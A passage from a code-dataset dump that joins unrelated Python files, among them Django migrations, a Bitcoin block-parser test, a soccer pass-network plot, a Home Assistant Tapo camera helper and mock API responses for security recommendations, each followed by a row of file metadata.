Created on Wed Feb 26 22:23:07 2020
@author: Neal LONG
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems")) | 27 | 80 | 0.623094 | 129 | 918 | 4.348837 | 0.457364 | 0.062389 | 0.085562 | 0.096257 | 0.606061 | 0.541889 | 0.392157 | 0.335116 | 0.335116 | 0.335116 | 0 | 0.070039 | 0.160131 | 918 | 34 | 81 | 27 | 0.657588 | 0.12963 | 0 | 0.529412 | 0 | 0 | 0.509881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.647059 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
4c545b9b4e257d67ea1869f9e75cf7e1b7bca4c8 | 613 | py | Python | backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | [
"MIT"
] | null | null | null | backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | [
"MIT"
] | null | null | null | backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0020_auto_20201204_2324'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profileBankAccountNr',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='profile',
name='profileTelephoneNumber',
field=models.CharField(blank=True, max_length=15, null=True),
),
]
| 25.541667 | 73 | 0.60522 | 63 | 613 | 5.777778 | 0.650794 | 0.10989 | 0.137363 | 0.159341 | 0.428571 | 0.428571 | 0.208791 | 0 | 0 | 0 | 0 | 0.079365 | 0.280587 | 613 | 23 | 74 | 26.652174 | 0.746032 | 0.073409 | 0 | 0.352941 | 1 | 0 | 0.144876 | 0.079505 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4c55251ed58f769e9fbe55114b14a016770952cb | 1,075 | py | Python | libcity/executor/map_matching_executor.py | nadiaaaaachen/Bigscity-LibCity | d8efd38fcc238e3ba518c559cc9f65b49efaaf71 | [
"Apache-2.0"
] | 1 | 2021-11-22T12:22:32.000Z | 2021-11-22T12:22:32.000Z | libcity/executor/map_matching_executor.py | yuanhaitao/Bigscity-LibCity | 9670c6a2f26043bb8d9cc1715780bb599cce2cd5 | [
"Apache-2.0"
] | null | null | null | libcity/executor/map_matching_executor.py | yuanhaitao/Bigscity-LibCity | 9670c6a2f26043bb8d9cc1715780bb599cce2cd5 | [
"Apache-2.0"
] | null | null | null | from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator


class MapMatchingExecutor(AbstractTraditionExecutor):
    def __init__(self, config, model):
        self.model = model
        self.config = config
        self.evaluator = get_evaluator(config)
        self.evaluate_res_dir = './libcity/cache/evaluate_cache'
        self._logger = getLogger()

    def evaluate(self, test_data):
        """
        Run the model on the test data and collect evaluation results.

        Args:
            test_data: test dataset containing 'route' and 'rd_nwk' entries
        """
        result = self.model.run(test_data)
        batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
        self.evaluator.collect(batch)
        self.evaluator.save_result(self.evaluate_res_dir)

    def train(self, train_dataloader, eval_dataloader):
        """
        Traditional (non-learning) models require no training, so this is a no-op.

        Args:
            train_dataloader(torch.Dataloader): Dataloader
            eval_dataloader(torch.Dataloader): Dataloader
        """
        pass  # do nothing
# Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('budget', '0004_auto_20200407_2356'),
    ]

    operations = [
        migrations.DeleteModel(
            name='HiddenStatus_Budget',
        ),
    ]
from mo_parsing import ParseFatalException
from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""


def convertToHTML(opening, closing):
    def conversionParseAction(t, l, s):
        return opening + t[0] + closing

    return conversionParseAction


italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))


def convertToHTML_A(t, l, s):
    try:
        text, url = t[0].split("->")
    except ValueError:
        raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
    return '<A href="{}">{}</A>'.format(url, text)


urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
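The grammar above relies on mo_parsing; the same wiki-to-HTML transformation can be sketched with only the standard library's `re` module. This is a hedged stand-in for illustration, not the mo_parsing API:

```python
import re

def wiki_to_html(text):
    # Order matters: match the longest delimiter first, mirroring the
    # boldItalicized | bolded | italicized alternation above.
    text = re.sub(r"\*\*\*(.+?)\*\*\*", r"<B><I>\1</I></B>", text)
    text = re.sub(r"\*\*(.+?)\*\*", r"<B>\1</B>", text)
    text = re.sub(r"\*(.+?)\*", r"<I>\1</I>", text)
    # {{text->url}} becomes an anchor tag, mirroring convertToHTML_A.
    text = re.sub(r"\{\{(.+?)->(.+?)\}\}", r'<A href="\2">\1</A>', text)
    return text

print(wiki_to_html("*italic* and **bold** and {{Home->https://example.com}}"))
# <I>italic</I> and <B>bold</B> and <A href="https://example.com">Home</A>
```

Unlike the parser-combinator version, the regex sketch has no error reporting for malformed links; that is what `ParseFatalException` buys in the original.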
import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA


def sign_data(key, data, output_file):
    with open(key, 'r', encoding='utf-8') as keyFile:
        rsakey = RSA.importKey(keyFile.read())
        signer = pkcs1_15.new(rsakey)
        digest = SHA256.new(data.encode('utf-8'))
        with open(output_file, 'wb') as out:
            out.write(signer.sign(digest))


if __name__ == '__main__':
    key_file = sys.argv[1]
    input_string = sys.argv[2]
    out_file = sys.argv[3]
    sign_data(key_file, input_string, out_file)
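The script signs but never verifies; with pycryptodome the counterpart is `pkcs1_15.new(public_key).verify(digest, signature)`. Since that package may not be installed here, the sign/verify round trip below is sketched with a stdlib HMAC standing in for the RSA primitive — the key and payload are hypothetical, and only the structure (hash the payload, then produce/check a signature over the digest) matches the script above:

```python
import hashlib
import hmac

# Hypothetical stand-in for the RSA keypair: a shared HMAC secret.
SECRET = b"license-signing-key"

def sign_license(data: str) -> bytes:
    digest = hashlib.sha256(data.encode("utf-8")).digest()
    return hmac.new(SECRET, digest, hashlib.sha256).digest()

def verify_license(data: str, signature: bytes) -> bool:
    # compare_digest avoids timing side channels on the comparison.
    return hmac.compare_digest(sign_license(data), signature)

sig = sign_license("user=alice;expires=2030-01-01")
print(verify_license("user=alice;expires=2030-01-01", sig))   # True
print(verify_license("user=mallory;expires=2099-01-01", sig)) # False
```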
"""
Handles most general questions (including math!)
Requires:
- WolframAlpha API key
Usage Examples:
- "How tall is Mount Everest?"
- "What is the derivative of y = 2x?"
"""
import wolframalpha
from orion.classes.module import Module
from orion.classes.task import ActiveTask
from orion import settings
wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY)


class AnswerTask(ActiveTask):
    def match(self, text):
        return True

    def action(self, text):
        try:
            query = wolfram_client.query(text)
            self.speak(next(query.results).text)
        except Exception:
            self.speak(settings.NO_MODULES)


class Wolfram(Module):
    def __init__(self):
        tasks = [AnswerTask()]
        super(Wolfram, self).__init__('wolfram', tasks, priority=0)
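The match/action contract that `AnswerTask` implements is easier to see in isolation. A minimal, dependency-free sketch of the same dispatch pattern follows; the task class names and behaviors here are hypothetical, not part of orion:

```python
class Task:
    def match(self, text):
        raise NotImplementedError

    def action(self, text):
        raise NotImplementedError

class EchoTask(Task):
    def match(self, text):
        return text.startswith("say ")

    def action(self, text):
        return text[4:]

class FallbackTask(Task):
    def match(self, text):
        return True  # like AnswerTask, matches everything

    def action(self, text):
        return "no module could answer"

def dispatch(tasks, text):
    # First matching task wins; a catch-all like AnswerTask goes last.
    for task in tasks:
        if task.match(text):
            return task.action(text)

print(dispatch([EchoTask(), FallbackTask()], "say hello"))  # hello
```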
# Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers
#
# This file is part of bitcoin-blockchain-parser.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of bitcoin-blockchain-parser, including this file, may be copied,
# modified, propagated, or distributed except according to the terms contained
# in the LICENSE file.
import unittest
from datetime import datetime
from .utils import read_test_data
from blockchain_parser.block import Block


class TestBlock(unittest.TestCase):
def test_from_hex(self):
block_hex = read_test_data("genesis_block.txt")
block = Block.from_hex(block_hex)
self.assertEqual(1, block.n_transactions)
block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \
"b60a8ce26f"
self.assertEqual(block_hash, block.hash)
self.assertEqual(486604799, block.header.bits)
merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(merkle_root, block.header.merkle_root)
self.assertEqual(2083236893, block.header.nonce)
self.assertEqual(1, block.header.version)
self.assertEqual(1, block.header.difficulty)
self.assertEqual(285, block.size)
self.assertEqual(datetime.utcfromtimestamp(1231006505),
block.header.timestamp)
self.assertEqual("0" * 64, block.header.previous_block_hash)
for tx in block.transactions:
self.assertEqual(1, tx.version)
tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(tx_hash, tx.hash)
self.assertEqual(204, tx.size)
self.assertEqual(0, tx.locktime)
self.assertEqual(0xffffffff, tx.inputs[0].transaction_index)
self.assertEqual(0xffffffff, tx.inputs[0].sequence_number)
self.assertTrue("ffff001d" in tx.inputs[0].script.value)
self.assertEqual("0" * 64, tx.inputs[0].transaction_hash)
self.assertEqual(50 * 100000000, tx.outputs[0].value)
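The header fields asserted above (version, bits, nonce, timestamp, merkle root, block hash) all come straight from the 80-byte block header. A self-contained sketch of unpacking them for the same genesis block, without the library under test:

```python
import hashlib
import struct

# The 80-byte genesis block header, hex-encoded: version, previous block
# hash, merkle root, timestamp, bits, nonce -- all little-endian.
GENESIS_HEADER = bytes.fromhex(
    "01000000"                                                          # version
    "0000000000000000000000000000000000000000000000000000000000000000"  # prev hash
    "3ba3edfd7a7b12b27ac72c3e67768f617fc81bc3888a51323a9fb8aa4b1e5e4a"  # merkle root
    "29ab5f49"                                                          # timestamp
    "ffff001d"                                                          # bits
    "1dac2b7c"                                                          # nonce
)

version, prev_hash, merkle_root, timestamp, bits, nonce = struct.unpack(
    "<I32s32sIII", GENESIS_HEADER
)
# A block hash is double SHA-256 of the header, displayed byte-reversed.
block_hash = hashlib.sha256(
    hashlib.sha256(GENESIS_HEADER).digest()
).digest()[::-1].hex()

print(version, timestamp, nonce)  # 1 1231006505 2083236893
print(block_hash)
```

The computed hash matches the `block_hash` constant in the test, which is why the assertions above hold.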
"""
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add on the subsitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the receipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/ max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
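The min/max pairing above collapses A→B and B→A passes onto one undirected edge before counting. The same trick in isolation, with hypothetical position data and only the standard library:

```python
from collections import Counter

# Hypothetical pass events as (passer position, recipient position).
passes = [("RB", "RCM"), ("RCM", "RB"), ("RB", "RCM"), ("GK", "RB")]

# Sorting each pair (equivalent to the pos_min/pos_max columns) maps both
# directions of a pairing onto a single key before counting.
edge_counts = Counter(tuple(sorted(pair)) for pair in passes)
print(edge_counts)  # Counter({('RB', 'RCM'): 3, ('GK', 'RB'): 1})
```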
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
from enum import Enum


class CustomEnum(Enum):
    @classmethod
    def has_value(cls, value):
        return any(value == item.value for item in cls)

    @classmethod
    def from_value(cls, value):
        found_element = None
        if cls.has_value(value):
            found_element = cls(value)
        return found_element


class Direction(CustomEnum):
    EAST = 0x1
    SOUTH = 0x2
    WEST = 0x3
    NORTH = 0x4


class Action(CustomEnum):
    FLASH_RED = 0x32
    GREEN = 0x33
    FLASH_GREEN = 0x34
    PEDESTRIAN = 0x35
    EMERGENCY = 0x37


class Intersection(CustomEnum):
    A = 0x62
    B = 0x61
    BOTH = 0x63


class Mode(CustomEnum):
    LIVE = 0
    SIMULATION = 1
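`has_value`/`from_value` let callers map raw protocol bytes to enum members without catching `ValueError`. A self-contained usage sketch (the `Direction` subset below is abbreviated for the example):

```python
from enum import Enum

class CustomEnum(Enum):
    @classmethod
    def has_value(cls, value):
        return any(value == item.value for item in cls)

    @classmethod
    def from_value(cls, value):
        # Returns None for unknown values instead of raising ValueError.
        return cls(value) if cls.has_value(value) else None

class Direction(CustomEnum):
    EAST = 0x1
    SOUTH = 0x2

print(Direction.has_value(0x2))    # True
print(Direction.from_value(0x2))   # Direction.SOUTH
print(Direction.from_value(0x99))  # None
```

Returning `None` instead of raising keeps byte-stream parsing code free of try/except at every lookup site.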
import onvif
import os
import asyncio
import urllib.parse
from onvif import ONVIFCamera
from pytapo import Tapo
from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD
from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD
from homeassistant.components.onvif.event import EventManager
from homeassistant.components.ffmpeg import DATA_FFMPEG
from haffmpeg.tools import IMAGE_JPEG, ImageFrame


def registerController(host, username, password):
return Tapo(host, username, password)


async def isRtspStreamWorking(hass, host, username, password):
_ffmpeg = hass.data[DATA_FFMPEG]
ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop)
username = urllib.parse.quote_plus(username)
password = urllib.parse.quote_plus(password)
streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1"
image = await asyncio.shield(
ffmpeg.get_image(
streaming_url,
output_format=IMAGE_JPEG,
)
)
return not image == b""


async def initOnvifEvents(hass, host, username, password):
device = ONVIFCamera(
host,
2020,
username,
password,
f"{os.path.dirname(onvif.__file__)}/wsdl/",
no_cache=True,
)
try:
await device.update_xaddrs()
device_mgmt = device.create_devicemgmt_service()
device_info = await device_mgmt.GetDeviceInformation()
if "Manufacturer" not in device_info:
raise Exception("Onvif connection has failed.")
return device
except Exception:
pass
return False


async def getCamData(hass, controller):
camData = {}
presets = await hass.async_add_executor_job(controller.isSupportingPresets)
camData["user"] = controller.user
camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo)
camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"]
try:
motionDetectionData = await hass.async_add_executor_job(
controller.getMotionDetection
)
motion_detection_enabled = motionDetectionData["enabled"]
if motionDetectionData["digital_sensitivity"] == "20":
motion_detection_sensitivity = "low"
elif motionDetectionData["digital_sensitivity"] == "50":
motion_detection_sensitivity = "normal"
elif motionDetectionData["digital_sensitivity"] == "80":
motion_detection_sensitivity = "high"
else:
motion_detection_sensitivity = None
except Exception:
motion_detection_enabled = None
motion_detection_sensitivity = None
camData["motion_detection_enabled"] = motion_detection_enabled
camData["motion_detection_sensitivity"] = motion_detection_sensitivity
try:
privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode)
privacy_mode = privacy_mode["enabled"]
except Exception:
privacy_mode = None
camData["privacy_mode"] = privacy_mode
try:
alarmData = await hass.async_add_executor_job(controller.getAlarm)
alarm = alarmData["enabled"]
alarm_mode = alarmData["alarm_mode"]
except Exception:
alarm = None
alarm_mode = None
camData["alarm"] = alarm
camData["alarm_mode"] = alarm_mode
try:
commonImageData = await hass.async_add_executor_job(controller.getCommonImage)
day_night_mode = commonImageData["image"]["common"]["inf_type"]
except Exception:
day_night_mode = None
camData["day_night_mode"] = day_night_mode
try:
led = await hass.async_add_executor_job(controller.getLED)
led = led["enabled"]
except Exception:
led = None
camData["led"] = led
try:
auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget)
auto_track = auto_track["enabled"]
except Exception:
auto_track = None
camData["auto_track"] = auto_track
if presets:
camData["presets"] = presets
else:
camData["presets"] = {}
return camData


async def update_listener(hass, entry):
"""Handle options update."""
host = entry.data.get(CONF_IP_ADDRESS)
username = entry.data.get(CONF_USERNAME)
password = entry.data.get(CONF_PASSWORD)
motionSensor = entry.data.get(ENABLE_MOTION_SENSOR)
cloud_password = entry.data.get(CLOUD_PASSWORD)
try:
if cloud_password != "":
tapoController = await hass.async_add_executor_job(
registerController, host, "admin", cloud_password
)
else:
tapoController = await hass.async_add_executor_job(
registerController, host, username, password
)
hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController
except Exception:
LOGGER.error(
"Authentication to Tapo camera failed."
+ " Please restart the camera and try again."
)
for entity in hass.data[DOMAIN][entry.entry_id]["entities"]:
entity._host = host
entity._username = username
entity._password = password
if hass.data[DOMAIN][entry.entry_id]["events"]:
await hass.data[DOMAIN][entry.entry_id]["events"].async_stop()
if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor")
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False
if motionSensor:
await setupOnvif(hass, entry, host, username, password)


async def setupOnvif(hass, entry, host, username, password):
hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents(
hass, host, username, password
)
if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]:
hass.data[DOMAIN][entry.entry_id]["events"] = EventManager(
hass,
hass.data[DOMAIN][entry.entry_id]["eventsDevice"],
f"{entry.entry_id}_tapo_events",
)
hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents(
hass, entry
)


async def setupEvents(hass, entry):
if not hass.data[DOMAIN][entry.entry_id]["events"].started:
events = hass.data[DOMAIN][entry.entry_id]["events"]
if await events.async_start():
if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(
entry, "binary_sensor"
)
)
return True
else:
return False
"""Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "rbaratheon@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "tlannister@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
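A hedged sketch of how a test might consume these fixtures: selecting results whose workflow status matches, mirroring the `status` criteria in `SEARCH_REQ`. The helper name and the trimmed records below are hypothetical, not part of the SDK:

```python
def filter_by_status(search_resp, statuses):
    """Return the results whose workflow status is in the given set."""
    return [
        r for r in search_resp["results"]
        if r["workflow"]["status"] in statuses
    ]

# Trimmed stand-ins for the full fixture records above.
resp = {
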